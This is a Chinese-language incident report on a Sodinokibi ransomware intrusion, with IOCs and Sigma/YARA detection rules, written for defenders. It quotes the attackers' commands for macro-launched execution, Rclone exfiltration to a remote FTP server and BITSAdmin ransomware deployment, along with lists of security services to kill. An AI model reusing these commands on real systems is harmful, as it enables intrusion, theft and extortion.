文章/答案/技术大牛

发布

社区首页 >专栏 >Sodinokibi(aka REvil)勒索软件

Sodinokibi(aka REvil)勒索软件

Al1ex

发布于 2021-07-21 09:13:10

1.5K00

代码可运行

文章被收录于专栏：网络安全攻防网络安全攻防

运行总次数：0

代码可运行

介绍

Sodinokibi(又名REvil)在过去的几年里一直是最多产的勒索软件即服务(RaaS)组织之一。据称，这一勒索软件家族是Travelex 入侵事件的幕后黑手，目前的报道指出，针对Acer(宏碁)的一次攻击，要求支付5000万美元的赎金。

今年3月，我们观察到一种入侵，这种入侵始于恶意垃圾邮件，将IcedID(Bokbot)投放到目标环境中，随后允许访问分发Sodinokibi勒索软件的组。在入侵期间，威胁参与者将权限提升到域管理员，窃取了数据，并使用Sodinokibi勒索所有加入域的系统。

案例摘要

IcedID特洛伊木马于2017年首次被发现，目前作为几个 ransomware families(勒索软件家族)的初始访问代理。在我们的入侵中，威胁参与者利用了使用xlsm document的恶意垃圾邮件，该文档在打开并启用宏时，启动了wmic命令，以一个伪装成GIF图像的远程可执行文件执行 IcedID特洛伊木马。

持久性是通过计划任务实现的，发现命令是在执行数分钟内从恶意软件启动的。在初次访问大约一个半小时后，恶意软件从两个不同的C2服务器上下载了Cobalt Strike Beacons，这两个服务器在整个入侵过程中都被使用。Cobalt Strike Beacons建立后，开始横向移动，首先移动到Exchange服务器，然后再移动到其他服务器。我们完全没有看到攻击者与Exchange应用程序进行交互，一开始，似乎攻击来自Exchange，但经过仔细检查，我们评估源代码确实是IcedID。似乎威胁行为者希望我们相信Exchange是攻击的来源，因为他们使用Cobalt Strike通过Exchange转移到域中的其他系统。

在破坏Exchange服务器后，攻击者使用通过远程服务执行的SMB和PowerShell Beacon迁移到域控制器和环境中的其他系统。攻击者被杀毒软件稍微减慢了速度，杀毒软件kill掉了几个Beacon，但攻击者最终通过改变他们的横向移动技术绕过了它。

使用AdFind和Ping实用程序从域控制器进行了信息收集，以测试域控制器和其他加入域的系统之间的连接。信息收集完成后，将从lsass转储凭据。完成这些任务后，威胁参与者开始在域中的各个系统之间建立RDP连接。

入侵事件发生三个半小时后，威胁行为人利用Rclone伪装成svchost可执行文件，收集并过滤网络共享内容，用于双重勒索。

四个小时后，威胁行动方开始着手实现最终目标。他们在域控制器上暂存勒索软件可执行文件，然后使用BITSAdmin将其下载到域中的每个系统。之后，威胁参与者使用RDP打开cmd或PowerShell进程，然后使用特定的标志-smode执行Sodinokibi勒索软件，执行时，该标志会写入几个RunOnce注册表项，然后立即将系统重新启动到安全模式并联网。加密不会在重新启动后立即启动，但需要用户登录，在这种情况下，威胁参与者通过在重新启动后登录来完成。

使用网络启动到安全模式会阻止安全工具和其他管理代理的启动。

网络工作正常，但是由于服务无法启动，因此我们无法使用常规工具远程管理系统。我们认为，此过程将阻止某些EDR代理启动并可能检测到勒索软件执行。

在某些系统上，不带-smode标志执行勒索软件，而在其他系统上，则通过rundll32执行dll来加密系统，而无需重新启动并允许威胁参与者在加密过程完成时保持存在。

初始访问后约4.5小时，威胁参与者已完成加密所有加入域的系统的任务。感染留下的勒索软件包括指向其Tor网站的链接，如果在7天内付款，则解密的价格约为20万美元。如果我们在7天内没有付款，价格将高达40万美元。赎金必须以门罗币支付，而不是通常的比特币。这可能是为了更好地保护付款免受跟踪活动(如Chainaylsis进行的活动)的影响。威胁行动者在自己的网站上将自己标识为Sodinokibi，并链接到Coveware博客，以确保如果付款成功，则解密将成功。

相关服务

我们的Threat Feed(威胁源服务)在入侵发生的前一天从两个Cobalt-Strike服务器中提取了一个，另一个IP在我们发现它后就被添加到了源中。

在我们的安全研究人员和组织服务下，我们还可以从这个案例中获得工具，例如勒索软件样本(dll和exe)、pcap、内存捕获、文件、Kape包等等。

Timeline

MITRE ATT&CK

Initial Access

此入侵的初始访问是通过malspam活动进行的，在期待Qbot下载的同时，我们发现IcedID是这次交付的有效负载选择，类似于James Quinn最近指出的活动。

传递格式是xlsm文件：

文档的初始执行将文件写入：

C:\Users\Public\microsoft.security

使用wmic创建一个进程并使用regsrv32执行该文件

wmic.exe process call create 'regsvr32 -s C:\Users\Public\microsoft.security'

然后，它发出了一个从这个URL下载文件的网络请求

http://vpu03jivmm03qncgx.com/index.gif

然而，GIF是IcedID恶意软件

Execution

一旦将IcedID下载到主机上，就会使用rundll32.exe执行恶意软件

rundll32.exe "C:\Users\USERNAME\AppData\Local\Temp\skull-x64.dat",update /i:"DwarfWing\license.dat"

在执行之后，恶意软件与161.35.109[.]168取得了联系，在整个入侵过程中，恶意软件一直在与161.35.109[.]168保持联系

Persistence

IcedID使用计划任务在beach head主机上设置持久性。

wewouwquge_{A3112501-520A-8F32-871A-380B92917B3D}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\wewouwquge_{A3112501-520A-8F32-871A-380B92917B3D}

勒索软件可执行文件的执行为持久性创建了RunOnce密钥

HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*AstraZeneca

Privilege Escalation

完成LDAP发现(BloodHound)后，Cobalt Strike Beacon在wauclt.exe文件进程为UAC旁路执行了几个PowerShell函数，包括：

UAC-TokenMagic

Invoke-SluiBypass

Defense Evasion

在初始访问后大约一个半小时，IcedID连接了两个Cobalt Strike服务器。

使用Cobalt Strike Beacons在整个环境中多次使用过程注入

在执行勒索软件之前，威胁参与者创建了一个GPO以在所有systems/OU中禁用Windows Defender

The GPO was named "new"

Credential Access

凭据已使用CS Beacons转储到服务器和域控制器上

Discovery

IcedID恶意软件在执行后几分钟内首次发现：

cmd.exe /c chcp >&2 
WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
ipconfig.exe ipconfig /all 
systeminfo
net config workstation
nltest /domain_trusts 
nltest /domain_trusts /all_trusts 
net view /all /domain 
net view /all
net.exe net group "Domain Admins" /domain

一系列LDAP查询从wauclt.exe文件(Cobalt Strike)

"DistinguishedName": "CN=Terminal Server License Servers,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=RAS and IAS Servers,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Incoming Forest Trust Builders,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Account Operators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Cert Publishers,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Server Operators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Storage Replica Administrators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Hyper-V Administrators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Remote Management Users,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Access Control Assistance Operators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=RDS Management Servers,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=RDS Endpoint Servers,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Event Log Readers,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=RDS Remote Access Servers,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Certificate Service DCOM Access,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Performance Log Users,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Cryptographic Operators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Distributed COM Users,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Network Configuration Operators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Performance Monitor Users,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Remote Desktop Users,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Replicator,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Backup Operators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Print Operators,CN=Builtin,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Infra,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=ExchangeLegacyInterop,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Security Administrator,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Security Reader,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Compliance Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Discovery Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Hygiene Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Delegated Setup,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Records Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Help Desk,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=UM Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Public Folder Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=View-Only Organization Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=DnsUpdateProxy,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Recipient Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Protected Users,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Cloneable Domain Controllers,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Enterprise Key Admins,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Key Admins,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Domain Guests,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Enterprise Read-only Domain Controllers,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Read-only Domain Controllers,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Domain Computers,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Domain Users,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }
"DistinguishedName": "CN=Domain Controllers,CN=Users,DC=DomainName,DC=local", "ScopeOfSearch": "Base", "SearchFilter": "member=*" }

我们相信这一活动与Bloodhound扫描有关，因为几秒钟后，我们看到Bloodhound扫描结果在被删除之前被放到了磁盘上

一旦在环境中的Exchange服务器上，威胁参与者就会对所有加入域的系统执行DNS请求，并ping一些以检查连接。

在域控制器上执行AdFind以收集其他信息，如名称、操作系统和DNS名称。

cmd.exe /C adfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName > some.csv

Lateral Movement

对于横向移动，威胁行为者在整个区域使用各种技术，其中一种方法是Cobalt Strike

可执行文件使用SMB传输，并通过远程服务执行

在其他系统上，PowerShell与相同的远程服务执行一起使用

为了便于最终的勒索软件部署，RDP连接是从域控制器以及环境中的辅助服务器启动的。

Collection

Rclone实用程序用于从文件共享中收集信息并过滤数据

 svchost.exe --config svchost.conf --progress --no-check-certificate copy "\\ServerName\C$\ShareName" ftp1:/DomainName/FILES/C/ShareName

Command and Contro

IcedID:

cikawemoret34.space

206.189.10.247:80

nomovee.website

161.35.109.168:443

JA3: a0e9f5d64349fb13191bc781f81f42e1

JA3s: ec74a5c51106f0419184d0dd08fb05bc

Certificate:[e0:fc:e5:eb:fd:e7:da:0b:93:ac:dc:df:0d:e8:56:cc:7b:f2:58:43 ]
Not Before: 2021/03/11 02:06:51 
Not After: 2022/03/11 02:06:51 
Issuer Org: Internet Widgits Pty Ltd 
Subject Common: localhost 
Subject Org: Internet Widgits Pty Ltd 
Public Algorithm: rsaEncryption

Cobalt Strike:

45.86.163.78:443 cloudmetric.online JA3:a0e9f5d64349fb13191bc781f81f42e1 JA3s: ae4edc6faf64d08308082ad26be60767

Certificate:[b9:2c:48:71:1a:ba:eb:99:15:c4:0b:b0:31:ce:14:8e:a9:30:ac:d3 ]
Not Before: 2021/02/27 06:45:42  
Not After: 2021/05/28 07:45:42  
Issuer Org: Let's Encrypt 
Subject Common: cloudmetric.online [cloudmetric.online]
Public Algorithm: rsaEncryption

Cobalt Config:

{
"x64": {
"config": {
"HTTP Method Path 2": "/jquery-3.2.2.full.js",
"Beacon Type": "0 (HTTP)",
"Method 2": "POST",
"Polling": 48963,
"Jitter": 24,
"Spawn To x64": "%windir%\\sysnative\\WUAUCLT.exe",
"Spawn To x86": "%windir%\\syswow64\\WUAUCLT.exe",
"Method 1": "GET",
"C2 Server": "cloudmetric.online,/jquery-3.2.2.min.js,45.86.163.78,/jquery-3.2.2.min.js",
"Port": 80
},
"sha256": "8d44894c09a2e30b40927f8951e01708d0a600813387c3c0872bcd6cb10a3e8c",
"sha1": "deab6be62e9c9793f9874bbdec9ff0a3acb82ad8",
"md5": "28ceee1f8f529a80bd0ff5e52240e404",
"time": 1615840900656.6
},
"x86": {
"config": {
"HTTP Method Path 2": "/jquery-3.2.2.full.js",
"Beacon Type": "0 (HTTP)",
"Method 2": "POST",
"Polling": 48963,
"Jitter": 24,
"Spawn To x64": "%windir%\\sysnative\\WUAUCLT.exe",
"Spawn To x86": "%windir%\\syswow64\\WUAUCLT.exe",
"Method 1": "GET",
"C2 Server": "cloudmetric.online,/jquery-3.2.2.min.js,45.86.163.78,/jquery-3.2.2.min.js",
"Port": 80
},
"sha256": "11af3609884ad674a1c86f42ec27719094e935d357d73e574b75c787a0e8c0f1",
"sha1": "a30de5ca8a107fd69c8885a975224ea8ff261002",
"md5": "bbc6592c67d233640a9ca0d0d915003c",
"time": 1615840895189
}
}

195.189.99.74 smalleststores.com JA3: 72a589da586844d7f0818ce684948eea JA3s: ae4edc6faf64d08308082ad26be60767

Certificate: [14:f4:79:e3:fd:98:21:60:68:fd:1c:0a:e6:c6:f9:71:f4:ac:f9:df]
Not Before: 2021/03/11 11:02:43  
Not After: 2021/06/09 12:02:43  
Issuer Org: Let's Encrypt 
Subject Common: smalleststores.com [smalleststores.com]
Public Algorithm: rsaEncryption

Cobalt Config:

{
"x86": {
"config": {
"Method 1": "GET",
"Method 2": "GET",
"Spawn To x86": "%windir%\\syswow64\\mstsc.exe",
"C2 Server": "smalleststores.com,/owa/,195.189.99.74,/owa/",
"Beacon Type": "8 (HTTPS)",
"Polling": 59713,
"Jitter": 41,
"Port": 443,
"Spawn To x64": "%windir%\\system32\\calc.exe",
"HTTP Method Path 2": "/OWA/"
},
"md5": "88365eb3d504f570f22d76f777ab2caf",
"sha256": "4b25f708c506e0cc747344ee79ecda48d51f6c25c9cb45ceb420575458f56720",
"sha1": "f42f2eea6cf88d30cfd6207182528be6ae2e504f",
"time": 1615846680369.8
},
"x64": {
"config": {
"Method 1": "GET",
"Method 2": "GET",
"Spawn To x86": "%windir%\\syswow64\\mstsc.exe",
"C2 Server": "smalleststores.com,/owa/,195.189.99.74,/owa/",
"Beacon Type": "8 (HTTPS)",
"Polling": 59713,
"Jitter": 41,
"Port": 443,
"Spawn To x64": "%windir%\\system32\\calc.exe",
"HTTP Method Path 2": "/OWA/"
},
"md5": "27ca24a7f6d02539235d46e689e6e4ac",
"sha256": "e35c31ba3e10f59ae7ea9154e2c0f6f832fcff22b959f65b607d6ba0879ab641",
"sha1": "6885d84c1843c41ff8197d7ab0c8e42e20a7ecaa",
"time": 1615846684589
}
}

Exfiltration

从域收集的数据已导出到位于以下位置的远程服务器：

45.147.160.5:443

Impact

在最后的行动中，威胁参与者在C:\Windows中的域控制器上丢弃了一个勒索软件可执行文件，然后使用BITSAdmin将该可执行文件部署到远程系统。

C:\Windows\system32\bitsadmin.exe /transfer debjob /download /priority normal \\DOMIANCONTROLLER\c$\windows\DOMAINNAME.exe C:\Windows\DOMAINNAME.exe

-smode标志与勒索软件可执行文件一起使用，以设置系统重新启动到安全模式，并使用恶意软件untertam指出的联网。

参见下面的-smode执行：

重启机器时，*franceisshit键用于引导机器脱离安全模式。

在运行这个smode命令后，系统重新启动到安全模式并联网，并留在登录屏幕上。登录后大约10-20秒，所有用户文件都被加密，包括桌面在内的许多地方都放了一张赎金条。服务无法启动，这导致了收集问题，因为普通代理无法启动。这还包括启动EDR和管理代理。

我们’我至少看到过一条关于smode设置自动登录键的tweet消息，但在我们的例子中我们没有看到，因此无法重现这种情况。

从安全模式重新启动后，您将看到以下桌面：

在某些系统上，如域控制器，威胁参与者选择不使用安全模式选项，而是使用rundll32执行的dll对系统进行加密，而无需重新启动，从而允许威胁参与者在勒索软件加密文件时保持访问权限。

C:\Windows\system32\rundll32.exe" C:\Windows\DomainName.dll,DllRegisterServer

威胁演员要求20万在Monero。他们被劝降了20-30%，本来可以被劝降更多。以下是该网站的一些截图。

在@hatching\u io的帮助下(https://tria.ge/)我们能够从勒索软件样本中解析配置

Campaign ID (sub): 7114
net: false

List of processes to kill (prc)

oracle
klnagent
mydesktopqos
infopath
BackupExtender
powerpnt
outlook
BackupAgent
Smc
sql
ccSvcHst
BackupUpdater
Rtvscan
winword
kavfsscs
ocssd
isqlplussvc
visio
ShadowProtectSvc
tbirdconfig
TSSchBkpService
dbeng50
ccSetMgr
agntsvc
Sage.NA.AT_AU.SysTray
dbsnmp
thebat
onenote
AmitiAvSrv
wordpad
msaccess
avgadmsv
thunderbird
BackupMaint
Microsoft.exchange.store.worker.exe
CarboniteUI
excel
SPBBCSvc
LogmeInBackupService
encsvc
ocomm
sqbcoreservice
NSCTOP
mydesktopservice
kavfs
kavfswp
ocautoupds
mspub
xfssvccon
DLOAdminSvcu
synctime
lmibackupvssservice
firefox
steam
dlomaintsvcu

List of services to kill

Telemetryserver
"Sophos AutoUpdate Service"
sophos
Altaro.Agent.exe
mysqld
MSSQL$MSGPMR
"SophosFIM"
"Sophos Web Control Service"
SQLWriter
svcGenericHost
AltiBack
"SQLServer Analysis Services (MSSQLSERVER)"
BackupExecAgentAccelerator
"StorageCraft ImageReady"
SQLTELEMETRY
AzureADConnectAuthenticationAgent
ntrtscan
ds_notifier
TeamViewer
"StorageCraft Raw Agent"
"StorageCraft Shadow Copy Provider"
SQLTELEMETRY$SQLEXPRESS
VeeamHvIntegrationSvc
AltiCTProxy
MsDtsServer130
ViprePPLSvc
McAfeeFramework
MSSQL$QM
"swi_service"
"ThreadLocker"
ofcservice
AUService
sophossps
AzureADConnectHealthSyncMonitor
Altaro.OffsiteServer.UI.Service.exe
"SAVAdminService"
ds_monitor
ALTIVRM
SSASTELEMETRY
TmCCSF
MsDtsServer110
"Sophos MCS Client"
TMBMServer
SBAMSvc
mfewc
"Sophos System Protection Service"
MSSQLFDLauncher$TESTBACKUP02DEV
VeeamDeploymentService
masvc
backup
MSSQL$SQLEXPRESS
AltiPhoneServ
MSSQLServerOLAPService
SSISTELEMETRY130
VeeamEndpointBackupSvc
mepocs
Altaro.UI.Service.exe
"ds_agent"
HuntressUpdater
MSSQLFDLauncher
"Sophos File Scanner Service"
SQLAgent$MSGPMR
ADSync
KaseyaAgent
ReportServer
MSSQLFDLauncher$SQLEXPRESS
MSSQL$HPWJA
KaseyaAgentEndpoint
VeeamTransportSvc
"ds_monitor"
mfevtp
MSSQLTESTBACKUP02DEV
SQLTELEMETRY$MSGPMR
ThreadLocker
MSSQLServerADHelper100
veeam
tmlisten
AzureADConnectHealthSyncInsights
"swi_filter"
MsDtsServer120
ProtectedStorage
VeeamDeploySvc
memtas
ds_agent
VeeamMountSvc
HuntressAgent
SQLAgent$SQLEXPRESS
bedbg
MSSQLSERVER
"ofcservice"
VipreAAPSvc
"Sophos Endpoint Defense Service"
KACHIPS906995744173948
DsSvc
MSSQLLaunchpad$SQLEXPRESS
msseces
macmnsvc
LTService
Code42Service
Altaro.HyperV.WAN.RemoteService.exe
LTSvcMon
MSSQL$SQLEXPRESSADV
"SAVService"
Altaro.OffsiteServer.Service.exe
"Sage 100cloud Advanced 2020 (9920)"
Altaro.SubAgent.exe
mfemms
"TeamViewer"
"SQLServer Reporting Services (MSSQLSERVER)"
VSS
sql
Altaro.SubAgent.N2.exe
"SQLServer Integration Services 12.0"
SQLSERVERAGENT
vss
"Sophos Safestore Service"
klnagent
"Sage.NA.AT_AU.Service"
MBAMService
"Sophos Health Service"
SQLBrowser
MySQL
"ProtectedStorage"
"Sophos Clean Service"
"Sage 100c Advanced 2017 (9917)"
"SntpService"
VeeamNFSSvc
KAVFS
SQLEXPRESSADV
KAENDCHIPS906995744173948
sppsvc
Amsp
psqlWGE
Microsoft.exchange.store.worker.exe
kavfsscs
"Amsp"
sqlservr
Altaro.DedupService.exe
svc$
"ds_notifier"
"Sophos Device Control Service"
AzureADConnectAgentUpdater
AltiFTPUploader
"Sophos MCS Agent"

不带smode的可执行文件的分类沙盒运行：

IOCs

Network

45.86.163.78|80
45.86.163.78|443
45.86.163.78|8080
195.189.99.74|80
195.189.99.74|443
195.189.99.74|8080
206.189.10.247|80
161.35.109.168|443
smalleststores.com
cloudmetric.online
cikawemoret34.space
nomovee.website

File

skull-x64.dat
5c3a6978bb960d8fbccd117ddcc3ca10
17424cfeb756e231bea6d1363151a83af142ba6f
59a2a5fae1c51afbbf1b8c6eb0a65cb2b8575794e3890f499f8935035e633fc
Ciocca.dll
296f1098a3a8cfb7e07808ee08361495
7d903f87fd305f1c93ec420848fd6e5aeb018d59
b1b00f7b065e8c013e0c23c0f34707819e0d537dbe2e83d0d023a11a0ca6b388
license.dat
6f208841cfd819c29a7cbc0a202bd7a3
0febc376cc066bb668f1a80b969ed112da8e871c
45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865
DomainName.dll
c8fab46c4fd61c5f138fb151638c35e1
c4830cbf3a3044f6e50cd60127ff5681f8ee4bbf
64076294e761cee0ce7d7cd28dae05f483a711eafe47f94fe881ac3980abfd8f
DomainName.exe
af94ccb62f97700115a219c4b7626d22
bb67edcfe4e5b6fe09ee96e5b8ace7a4cfe39eb7
2896b38ec3f5f196a9d127dbda3f44c7c29c844f53ae5f209229d56fd6f2a59c
svchost.exe (rclone)
fcfcf1e45e8d5cdca0450b8dc90754b68e8e4673
538078ab6d80d7cf889af3e08f62c4e83358596f31ac8ae8fbc6326839a6bfe5
AdFind.exe
cb198869ca3c96af536869e71c54dd9d83afbee6
56de41fa0a94fa7fff68f02712a698ba2f0a71afcecb217f6519bd5751baf3ed

Detections

Network

ETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2
ET DNS Query to a *.top domain
ET POLICY OpenSSL Demo CA - Internet Widgits Pty

Sigma

https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml

https://github.com/Neo23x0/sigma/blob/084cd39505861188d9d8f2d5c0f2835e4f750a3f/rules/windows/process_creation/win_malware_trickbot_recon_activity.yml

https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_commands_recon_activity.yml

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/sysmon_rundll32_net_connections.yml

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_adfind.yml

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_wmi_execution.yml

https://github.com/SigmaHQ/sigma/blob/a08571be9107d1c0e216400ffbb89c394fcd2570/rules/windows/process_creation/win_office_shell.yml

自定义规则感谢@0xThiebaut

title: Sodinokibi Ransomware Registry Key
id: 9fecd354-77f0-498e-a611-c963970e7bca
description: Detects the creation of Sodinokibi (aka REvil) registry keys
status: experimental
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://twitter.com/malwrhunterteam/status/1372648463553462279
tags:
- attack.persistence
- attack.t1547.001
date: 2021/03/29
author: Maxime THIEBAUT (@0xThiebaut)
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains:
- '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*AstraZeneca'
- '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*franceisshit'
condition: selection
level: high

习惯规则感谢@lindodapoet_

title: Svchost data exfiltration
id: dc4249c9-d96f-401b-a92b-caa6208c097d
status: experimental
description: Detects possible data exfiltration via svchost 
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
author: Nclose
date: 2021/03/29
tags:
- attack.exfiltration
- attack.t1048
logsource:
product: windows
service: process_creation
detection:
selection:
CommandLine|contains: 'copy'
Image|endswith: '\svchost.exe'
condition: selection
falsepositives:
- Unknown
level: high

Yara

/*
YARA Rule Set
Author: The DFIR Report
Date: 2021-03-29
Identifier: files
Reference: https://thedfirreport.com
*/

/* Rule Set ----------------------------------------------------------------- */

import "pe"

rule Sodinokibi_032021 {
meta:
description = "files - file DomainName.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-03-21"
hash1 = "2896b38ec3f5f196a9d127dbda3f44c7c29c844f53ae5f209229d56fd6f2a59c"
strings:
$s1 = "vmcompute.exe" fullword wide
$s2 = "vmwp.exe" fullword wide
$s3 = "bootcfg /raw /a /safeboot:network /id 1" fullword ascii
$s4 = "bcdedit /set {current} safeboot network" fullword ascii
$s5 = "7+a@P>:N:0!F$%I-6MBEFb M" fullword ascii
$s6 = "jg:\"\\0=Z" fullword ascii
$s7 = "ERR0R D0UBLE RUN!" fullword wide
$s8 = "VVVVVPQ" fullword ascii
$s9 = "VVVVVWQ" fullword ascii
$s10 = "Running" fullword wide /* Goodware String - occured 159 times */
$s11 = "expand 32-byte kexpand 16-byte k" fullword ascii
$s12 = "9RFIT\"&" fullword ascii
$s13 = "jZXVf9F" fullword ascii
$s14 = "tCWWWhS=@" fullword ascii
$s15 = "vmms.exe" fullword wide /* Goodware String - occured 1 times */
$s16 = "JJwK9Zl" fullword ascii
$s17 = "KkT37uf4nNh2PqUDwZqxcHUMVV3yBwSHO#K" fullword ascii
$s18 = "0*090}0" fullword ascii /* Goodware String - occured 1 times */
$s19 = "5)5I5a5" fullword ascii /* Goodware String - occured 1 times */
$s20 = "7-7H7c7" fullword ascii /* Goodware String - occured 1 times */
condition:
uint16(0) == 0x5a4d and filesize < 400KB and
( pe.imphash() == "031931d2f2d921a9d906454d42f21be0" or 8 of them )
}

rule icedid_032021_1 {
meta:
description = "files - file skull-x64.dat"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-03-21"
hash1 = "59a2a5fae1c51afbbf1bf8c6eb0a65cb2b8575794e3890f499f8935035e633fc"
strings:
$s1 = "update" fullword ascii /* Goodware String - occured 207 times */
$s2 = "PstmStr" fullword ascii
$s3 = "mRsx0k/" fullword wide
$s4 = "D$0lzK" fullword ascii
